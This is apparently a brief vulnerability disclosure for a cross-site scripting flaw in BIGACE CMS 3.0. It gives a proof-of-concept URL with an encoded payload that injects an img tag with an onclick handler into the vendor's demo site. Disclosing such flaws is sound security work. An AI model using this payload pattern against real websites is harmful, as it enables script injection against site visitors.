# Affected software: bigace cmc # Type of vulnerability:cross site scripting # URL:http://demo.bigace.de/ # Discovered by: provensec # Website: provensec.com #version: 3.0 # Proof of concept http://site/xsspayload demo:http://demo.bigace.de/%22%3E%3Cimg%20src=d%20onclick=confirm%281%29;%3E